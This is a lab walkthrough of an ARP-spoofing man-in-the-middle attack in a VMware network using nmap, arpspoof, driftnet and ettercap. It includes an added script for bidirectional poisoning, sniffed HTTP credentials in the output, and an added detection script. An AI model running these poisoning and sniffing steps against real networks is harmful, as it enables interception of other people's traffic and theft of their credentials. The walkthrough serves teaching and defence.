# Scan the machines on the same subnet (-sP is the legacy spelling of -sn: host discovery only, no port scan).
# The lab network in the output below is 192.168.6.0/24, so the scan target must be that range.
nmap -sP 192.168.6.*
```result
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 04:59 EDT
Nmap scan report for 192.168.6.2
Host is up (0.00036s latency).
MAC Address: 00:50:56:FF:00:94 (VMware)
Nmap scan report for 192.168.6.136
Host is up (0.00071s latency).
MAC Address: 00:0C:29:86:5C:97 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.000091s latency).
MAC Address: 00:50:56:EC:33:4B (VMware)
Nmap scan report for 192.168.6.135
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.94 seconds
```
# IP forwarding must be enabled before ARP spoofing. Otherwise, once the spoof succeeds, the target's
# packets dead-end at the attacker, the target loses its network connection and the victim notices.
# sysctl -w is not persistent across reboots. Reading the sysctl back and getting 1 confirms forwarding is on.
# Enable IP forwarding
sysctl -w net.ipv4.ip_forward=1
cat /proc/sys/net/ipv4/ip_forward
```result
1
```
# Look up the attacker's own IP address (192.168.6.135 on eth0 here, MAC 00:0c:29:14:46:33, which is the MAC that appears in the forged ARP replies below)
ifconfig
```result
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.6.135 netmask 255.255.255.0 broadcast 192.168.6.255
inet6 fe80::20c:29ff:fe14:4633 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:14:46:33 txqueuelen 1000 (Ethernet)
RX packets 691734 bytes 757137083 (722.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9398 bytes 639148 (624.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 60 bytes 2676 (2.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 60 bytes 2676 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
# Syntax: arpspoof -i <interface> -t <target IP> <host IP>
#   <host IP> is the address the attacker claims to own (normally the gateway); -t selects the victim.
#   If -t is omitted, arpspoof broadcasts the forged replies to every host on the segment.
#   arpspoof accepts exactly one host IP, not an IP range.
# Demo as run here: no -t, so every host on 192.168.6.0/24 is told that 192.168.6.255 (the broadcast
# address) is at the attacker's MAC. To intercept the Windows host 192.168.6.136 behind the gateway
# (192.168.6.2 in this VMware NAT lab), use instead:
#   arpspoof -i eth0 -t 192.168.6.136 192.168.6.2
arpspoof -i eth0 192.168.6.255
```result
0:c:29:14:46:33 0:0:0:0:0:0 0806 42: arp reply 192.168.6.255 is-at 0:c:29:14:46:33
0:c:29:14:46:33 0:0:0:0:0:0 0806 42: arp reply 192.168.6.255 is-at 0:c:29:14:46:33
0:c:29:14:46:33 0:0:0:0:0:0 0806 42: arp reply 192.168.6.255 is-at 0:c:29:14:46:33
```
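The steps above (enable forwarding, then run arpspoof) collected into one script, as an added example that is not part of the original page. It assumes dsniff's arpspoof is installed and the script runs as root; the function names (`valid_ipv4`, `ip_forward_enabled`, `arpspoof_cmds`, `run_arp_mitm`) are my own. It goes one step beyond the page: the page spoofs one direction without `-t`, whereas a working man-in-the-middle poisons both the target and the gateway so that traffic in both directions passes the attacker, and it refuses to start while `net.ipv4.ip_forward` is 0, since that is exactly the case in which the victim loses connectivity.

```shell
#!/bin/sh
# Added example (not from the original page): the arpspoof procedure wrapped in the checks a
# practitioner wants before poisoning a host. Assumes dsniff's arpspoof is installed and that
# this runs as root on the attacker box.

# valid_ipv4 ADDR: succeed if ADDR is a dotted quad with every octet in 0..255
valid_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# ip_forward_enabled [FILE]: succeed if the kernel forwards IPv4.
# FILE defaults to the sysctl node; the parameter exists so the check can be exercised offline.
ip_forward_enabled() {
    [ "$(cat "${1:-/proc/sys/net/ipv4/ip_forward}" 2>/dev/null)" = "1" ]
}

# arpspoof_cmds IFACE TARGET GATEWAY: print the two arpspoof commands of a bidirectional poison.
#   line 1 tells TARGET that GATEWAY is at the attacker's MAC (captures target -> gateway traffic)
#   line 2 tells GATEWAY that TARGET is at the attacker's MAC (captures gateway -> target traffic)
arpspoof_cmds() {
    printf 'arpspoof -i %s -t %s %s\n' "$1" "$2" "$3"
    printf 'arpspoof -i %s -t %s %s\n' "$1" "$3" "$2"
}

# run_arp_mitm IFACE TARGET GATEWAY: validate the addresses, refuse to run without IP forwarding,
# poison both directions, and on Ctrl-C pass SIGINT to both arpspoof processes: arpspoof handles
# SIGINT by sending the real MAC mappings again before it exits, which restores the victim's cache.
run_arp_mitm() {
    iface=$1; target=$2; gateway=$3
    valid_ipv4 "$target" && valid_ipv4 "$gateway" || { echo "invalid IPv4 address" >&2; return 2; }
    ip_forward_enabled || {
        echo "net.ipv4.ip_forward is 0: the victim would lose connectivity; run: sysctl -w net.ipv4.ip_forward=1" >&2
        return 3
    }
    arpspoof -i "$iface" -t "$target" "$gateway" &
    pid_target=$!
    arpspoof -i "$iface" -t "$gateway" "$target" &
    pid_gateway=$!
    trap 'kill -INT "$pid_target" "$pid_gateway" 2>/dev/null; wait' INT TERM
    wait "$pid_target" "$pid_gateway"
}

# Usage, with the lab addresses from the page (attacker on eth0, victim 192.168.6.136, gateway 192.168.6.2):
#   run_arp_mitm eth0 192.168.6.136 192.168.6.2
```

Stopping the script with Ctrl-C is the supported way to end the attack: killing arpspoof with SIGKILL skips its cleanup and leaves the victim's ARP cache pointing at a MAC that no longer answers.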
# Now compare the target's ARP cache before and after (run on the Windows target 192.168.6.136).
# A successful poison is visible here: the impersonated address (normally the gateway, 192.168.6.2)
# would resolve to the attacker's MAC 00-0c-29-14-46-33. In the snapshots below only a new entry for
# 192.168.6.254 appears, so the broadcast-address demo above did not alter any existing mapping.
arp -a
```result
Interface: 192.168.6.136 --- 0x6
  Internet Address      Physical Address      Type
  192.168.6.2           00-50-56-ff-00-94     dynamic
  192.168.6.135         00-0c-29-14-46-33     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
----------------------old/new----------------------
Interface: 192.168.6.136 --- 0x6
  Internet Address      Physical Address      Type
  192.168.6.2           00-50-56-ff-00-94     dynamic
  192.168.6.135         00-0c-29-14-46-33     dynamic
  192.168.6.254         00-50-56-ec-33-4b     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
```
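The before/after comparison above done by script rather than by eye, as an added example that is not part of the original page. It reads two snapshots in the Windows `arp -a` layout shown above and reports the two indicators a defender looks for: an IP whose MAC changed between snapshots, and one MAC claimed by several IPs (the attacker's real entry plus the gateway it now impersonates). The snapshots embedded in the script are constructed for the example, not captured output; the "after" one shows what a successful poison of 192.168.6.136 by the attacker at 192.168.6.135 would look like. The function names are my own.

```shell
#!/bin/sh
# Added example (not from the original page): ARP-poisoning indicators from two snapshots of a
# victim's ARP table in the Windows "arp -a" layout. Only "dynamic" rows are considered.

# arp_changed BEFORE AFTER: print "ip old_mac new_mac" for every dynamic entry whose MAC differs.
# MACs are normalised to lowercase colon form so they can be compared with the attacker's MAC
# as ifconfig prints it (00:0c:29:14:46:33).
arp_changed() {
    awk '
        tolower($3) == "dynamic" {
            mac = tolower($2); gsub("-", ":", mac)
            if (NR == FNR) old[$1] = mac
            else if (($1 in old) && old[$1] != mac) print $1, old[$1], mac
        }' "$1" "$2"
}

# arp_shared SNAPSHOT: print "mac ip1 ip2 ..." for every MAC that more than one IP resolves to
arp_shared() {
    awk '
        tolower($3) == "dynamic" {
            mac = tolower($2); gsub("-", ":", mac)
            if (seen[mac]++) ips[mac] = ips[mac] " " $1
            else ips[mac] = $1
        }
        END { for (m in seen) if (seen[m] > 1) print m, ips[m] }' "$1"
}

# arp_spoof_suspected BEFORE AFTER: succeed (exit 0) if either indicator fires
arp_spoof_suspected() {
    [ -n "$(arp_changed "$1" "$2")" ] || [ -n "$(arp_shared "$2")" ]
}

# Constructed snapshots (not captured output). Attacker: 192.168.6.135 / 00-0c-29-14-46-33,
# gateway: 192.168.6.2. In ARP_AFTER the gateway entry has been overwritten with the attacker's MAC.
ARP_BEFORE=$(mktemp); ARP_AFTER=$(mktemp)
trap 'rm -f "$ARP_BEFORE" "$ARP_AFTER"' EXIT
cat > "$ARP_BEFORE" <<'EOF'
Interface: 192.168.6.136 --- 0x6
  Internet Address      Physical Address      Type
  192.168.6.2           00-50-56-ff-00-94     dynamic
  192.168.6.135         00-0c-29-14-46-33     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
EOF
cat > "$ARP_AFTER" <<'EOF'
Interface: 192.168.6.136 --- 0x6
  Internet Address      Physical Address      Type
  192.168.6.2           00-0c-29-14-46-33     dynamic
  192.168.6.135         00-0c-29-14-46-33     dynamic
  192.168.6.254         00-50-56-ec-33-4b     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
EOF

echo "entries whose MAC changed:"
arp_changed "$ARP_BEFORE" "$ARP_AFTER"
echo "MACs claimed by several IPs:"
arp_shared "$ARP_AFTER"
```

The "shared MAC" check works from a single snapshot, so it is the one to run when no clean baseline exists; the "changed MAC" check needs a snapshot taken before the attack, which is why periodic ARP-table captures on important hosts are worth keeping.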
- On some systems arpspoof is not installed and the command is not found
- Normal case
  - sudo apt-get update
  - sudo apt-get install dsniff ssldump
- Otherwise (the package is not in the configured repositories)
  - cd /etc/apt/
  - sudo cp sources.list sources.list.bb
  - echo 'deb http://archive.ubuntu.com/ubuntu/ trusty main universe restricted multiverse' | sudo tee -a sources.list
  - sudo apt-get update
  - If the update fails with "the following signatures couldn't be verified because the public key is not available: NO_PUBKEY 40976EAF437D05B5 NO_PUBKEY 3B4FE6ACC0B21F32", run:
  - sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 40976EAF437D05B5
  - sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32
  - sudo apt-get update
  - sudo apt-get install dsniff ssldump
  - Caveat: trusty is Ubuntu 14.04, which is end of life, and mixing its repository into a Kali/Debian install can pull in incompatible packages. On Kali, dsniff is in the default repository, so the normal case should suffice; after installing, restore sources.list from the sources.list.bb backup.
- arpspoof is now installed
Start capturing web images
# With arpspoof still running
# Install driftnet
apt-get install driftnet
# Listen on the interface. Syntax: driftnet -i <interface> -d <local save directory> -a
# -a is adjunct mode: do not display images in a window, only save them to the directory
# and print each saved file name on stdout.
driftnet -i eth0 -d arpImg -a
# Sniff credentials on eth0 with ettercap. Syntax: -T text-mode interface, -q quiet (print only
# captured data), -i <interface>. ettercap here only sniffs; the redirection of the victim's
# traffic through this host is done by arpspoof above.
ettercap -Tq -i eth0
```result
HTTP : 121.41.88.106:80 -> USER: admin PASS: 123465 INFO: http://www.xnote.cn/
CONTENT: username=admin&password=123465
```
Summary from the practical run
- After the target is ARP-spoofed, Google Chrome on the target shows an insecure-connection warning when visiting an ordinary page
- HTTPS connections defeat both the image capture and the capture of submitted usernames and passwords: the traffic still passes through the attacker, but driftnet and ettercap only see ciphertext